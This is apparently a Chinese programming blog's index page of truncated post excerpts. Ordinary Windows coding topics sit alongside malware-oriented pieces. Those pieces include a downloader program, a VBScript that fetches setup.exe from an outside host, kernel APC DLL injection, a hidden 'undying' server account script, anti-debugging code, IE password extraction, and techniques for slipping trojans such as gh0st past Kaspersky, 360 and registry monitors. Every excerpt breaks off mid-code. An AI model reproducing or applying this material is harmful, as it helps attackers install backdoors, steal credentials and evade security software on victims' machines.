blackbean的专栏

V6中开发可运行在不同语言系统的Unicode程序，大致步骤如下：1、Project — Settings — C/C++ Tab — Preprocessor definitions：中加入_UNICODE, UNICODE。这里的_UNICODE和UNICODE的区别在于：_UNICODE用于Windows头文件，UNICODE用于C运行时头文件。2、将代码中的所有所有的 char 用

ring0 APC插dll...........虽然来自代码流氓...XX原因不在空间发....不过Sudami牛发了...俺就把代码帖上来吧...呵呵........不许做坏事哦....高手飘过     ----by sysnap         #include #define MAX_PID 65535/////////////////////////////////

自己写的一个下载者代码，为了减小程序的体积，所以用到的一些函数使用动态加载DLL，内嵌汇编的方式调用#include //CodyBy:xets007bool DownLoadFile(char *szUrl,char *szFile);void main(){char szUrl[]="http://127.0.0.1/test.exe";char szFile[]=

测试了一下 插入Explorer是可以的    但是不保证插入每一个进程都会成功。BOOL UseApcInsertDll(DWORD dwProcessID, char *strDllName){//打开进程HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);if (hProcess ==

ATAPI（磁盘端口驱动）级文件保护简单实现#define IoGetIrpStackLocation( Irp , Level) (\    (Irp)->Tail.Overlay.CurrentStackLocation + Level )BOOL IfIrpHasFobj(PIRP pIrp , LPCWSTR FileName){ULONG i , j ; PI

青松卓然js2854的博客[MiniFilter]驱动隐藏文件夹的实现（支持Win7）http://www.cnblogs.com/js2854/archive/2010/11/03/HideDir.html刚完成一个利用驱动隐藏文件夹的程序，隐藏文件的类似，现在贴出来共享给大家。代码相对比较简单，我是在别人代码的基础上改的。因为现在在网上找到的代码

//用调试器载入并运行后，调试器会一片空白#include #define ThreadHideFromDebugger 17typedef DWORD (WINAPI *ZW_SET_INFORMATION_THREAD)(HANDLE,DWORD,PVOID,ULONG);int APIENTRY WinMain(HINSTANCE hInstance,

set xPost = createObject("Microsoft.XMLHTTP") xPost.Open "GET","http://down.xxsafe.com/setup.exe",0xPost.Send() Set sGet = createObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Ope

作者：我非我 本文发表在2005.2期上.转载时请注明一、简单介绍 adsutil.vbs是什么？相信用过IIS的网管员不会不知道。这是IIS自带的提供于命令行下管理IIS的一个脚本。位于%SystemDrive%\Inetpub\AdminScripts目录下。足足有95,426字节大小。这么大的脚本一看就知道功能强大。事实也的确如此。基本上我的感觉它就是个命令行下的

添加隐藏的不死帐号的VBS脚本给服务器添加隐藏的不死帐号的VBS脚本的方法，网上看到的，不知道是否有用，主要是先留下来，以后有时间研究一下原理是什么，如果真能实现彻底隐藏，那么就太厉害了。1. door.vbs'***************'door.vbs by 黑嘿黑'***************dim wsh,FA,FSOset fso=CreateObj

目的：通过VBS上传本地的文件到服务端。服务端接受文件:upload_file.php图形操作界面：upload.php通过Wireshark抓包看到：VBS模拟Post的数据包和通过IE手工发送完全一样，但是服务器端就是不认，哪个地方出错了呢？代码如下：VBScript code:'''客户端文件upload.vbsDim objFile,fileContentSet o

看了 ChuKuangRen 的《Windows文件系统过滤驱动开发教程(第二版).pdf》后，颇有感触。我想，交流都是建立在平等的基础上，在抱怨氛围和环境不好的同时应该先想一想自己究竟付出了多少？只知索取不愿付出的人也就不用抱怨了，要怪也只能怪自己。发自己心得的人无非是两种目的，一是引发一些讨论，好纠正自己错误的认识，以便从中获取更多的知识使自己进步的更快。二是做一份备忘，当自己遗忘的时候能够马

一个 IRP 在过滤驱动中，把它分为需要安装 CompleteRoutine 的与无需安装 CompleteRoutine 的。那么在不需要安装 CompleteRoutine 的有以下几类情况。(1) 拿到这个 IRP 后什么都不做，直接调用 IoCompleteRequest() 来返回。(2) 拿到这个 IRP 后什么都不做，直接传递到底层设备，使用IoSkipCurrentIrpS

现在网络上流行的木马后门类工具很多，但可以称为精品的则没有多少，大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是，它们并不是一个真正的后门，极容易服务器管理员察觉，因此肉鸡经常飞掉也就很正常了。　一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里，给后门进程起一个看起来像系统进程的名字只是掩耳盗铃；不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新

写代码经常会遇到socket要通过代理连接服务器的情况，代理类型通畅有三种：HTTP、SOCK4和SOCK5，通过学习和网上参考相关代码，写了个代理类来实现该功能，贴出来与大家共享http://blog.youkuaiyun.com/bodybo/article/details/7274865

写出我在网络编程中的一点心得体会，希望对他(^_^也对大家)有帮助:1. 如果在已经处于 ESTABLISHED状态下的socket(一般由端口号和标志符区分）调用closesocket（一般不会立即关闭而经历TIME_WAIT的过程）后想继续重用该socket：BOOL bReuseaddr=TRUE;setsockopt(s,SOL_SOCKET ,SO_REUSEADDR,(

手工加载未注册的 COM 组件http://www.cppblog.com/sleepwom/archive/2010/02/16/107921.html二 14, 2010有时候我们运行程序的时候, 可能某个组件在系统内并不存在, 所以我们自己将这个组件打包在我们的安装包内, 但并不将其注册进系统. 这样做的目的就是尽量少的影响原有的系统. 组件只是在我们的应

nt i=0x9864int b=1;i+=b;int c=i;if i=cxxxxelsexxxx

卡巴斯基2010在针对数字签名和系统文件防护变的非常严格，注册表更不说，经过这么多年的升级基本上没有可以利用的价值，卡巴斯基2010之前版本可以通过修改感染系统文件进行启动，绕过监控，只需要给PE文件添加一个数字签名，由于卡吧监控并不严格只是判断是否加了签名，而没有判断签名是否正确，所以给很多马留了生存空间。  但是，卡巴2010后的版本就没

 HIVE法过注册表监控很早就已经出现了   首先提出的是EST的xyzreg  下面我就和各位分享一下我对ＨＩＶＥ法的一些认识　　现在注册表监控大多是挂RegSetValueEx这个函数，在攻击者修改某些特定键值的时候拦截，那我们就想办法使用其他的注册表操作函数达到同样的效果，ＨＩＶＥ法目前对于绝大部分注册表监控都是能突破的，因为总是有在规则外的键。　　操作Hive法要用的核心函数分

PS:这个方法用来过360服务提示是很不错的，放到gh0st里去，再把代码改下就好了 ^_^创建了一个类，提供三接口，一个用来启动服务，一个用来停止服务，一个用来调整启动方式滴    1. class CService   2. {   3. public:   4. BOOL SetStartType(DWORD dwOp);   5. void StopSe

通过一个示例程序，演示了控制台的一些小技巧：l        隐藏控制台窗口l        禁用控制台窗口关闭按钮l        控制台窗口启动最小化l        控制台程序开机自启动l       防止通过ctrl+c关闭控制台窗口（该功能跨平台）l 为控制台程序添加图标 /** * @file main.cpp * @brief 演示了隐藏控制台窗口、禁用关闭按钮、控制台窗口启动最小化、更改控制台图标的实现。 * @author Hao Liming * @d

注册表1.HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Curr entVersion/Run/All values in this key are executed.2.HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Curr entVersion/RunOnce/All values in this key are executed, and then their autostart ref

原作者：James BrownOriginal Author: James Brown原文链接：http://www.catch22.net/tuts/sysimg.aspOriginal Link: http://www.catch22.net/tuts/sysimg.asp点

在www.zlib.net 得到资料.自己整理了下,翻译了一部分. 整理成两部分,第一部分是提炼出来的函数列表.第二部分是原来的使用手册+自己翻译的.是用来自己用的.如果能给别人带来方便,也是意外的惊喜阿 .哈哈.-------------------------------

前言　　你可能不希望在发布程序时附带上一个外部的 DLL，因为可能会有些用户在无意中把 DLL 删除了而造成 EXE 不能正确运行，也有可能该 DLL 会被别人拿去使用，也有可能，此 DLL 会成为破解者破解你的程序的突破口。无论出于何种原因，如果你想把一个 DLL 合并到一

http://cid-764be6247129f878.spaces.live.com/blog/cns!764BE6247129F878!113.entry为了帮助初学者了解ShellCode的编写，并能一步一步操作得到自己的ShellCode，因此将Windows下She

WinInet库接口穿越代理服务器（转）收藏好久没有更新了，忙呀！最近在一个项目的实施过程中，发现使用socket不能穿越需要认证的代理服务器的情况，调用WinInet库函数可以实现。简单说说如下（1）使用socket可以穿越不需要用户认证的代理服务器，向应用

(转载于：http://hi.baidu.com/%B4%E7%B2%DD%D0%C4_/blog/item/e3a8200a28f6ea3ab1351d38.html)总结一下SHFileOperation的用法,希望对大家有用//删除文件或者文件夹bool

有个名叫Everything的软件，搜索文件飞快，看了一下原理，原来NTFS会记录文件的所有操作，也就是说即便文件被删除了，通过USN记录仍然可以知道文件名等部分信息。于是准备写个程序删掉这个信息，但研究了一下，发现它默认其实是关闭的，也就是没必要担心信息外漏。#define _CRT_SECURE_NO_WARNINGS#include #include #include

上回说到NTFS USN会记录下文件的所有操作，但默认情况下并没有激活这一功能，所以不用担心。在非激活状态，它也只剩下快速查找文件的功能。这回，假设USN JOURNAL被激活了（你可以用控制台命令fsutil usn，或上回说到的FSCTL_CREATE_USN_JOURNAL来开启这一功能），怎么回窥过去的操作？为此，写了段代码来进行试验，程序是检索 123.txt 操作历史（记录空间

找了好久，没找到相应函数，于是参照cv::imshow的源代码，搞出来一份。（OpenCV不简洁明了，学习的成本大于2天我就觉得太不值得了，下周准备试试CxImage）#include "highgui.h"#ifdef _DEBUG     #pragma comment( lib, "opencv_core220d.lib" )     #pragma comment(

/****************************************************************************************************都是网上的代码，自己组合起来的，刚开始报很多错误，花了很多时间终于搞定了环境：VC6.0+SDK（SDK必须）简单说明：IE7 IE8将网站的URL保存于历史文件中，将自动完成的密码保存

把新程序打包放到你的服务器上，外加一个配置说明文件(ini或xml)。你的程序跑起来的时候，启动一个慢线程，下载你的配置说明文件(ini或xml)，与本地的进行对照，如果一致就直接退出，如果有更新就接着下载到一个临时目录。这都是小意思了，重点是怎么覆盖原来的相应文件，因为系统跑起来的时候，文件是不能被删除和覆盖的。我的做法有四种一是如果只是某EXE或DLL有变化，那么先把本地的改名，然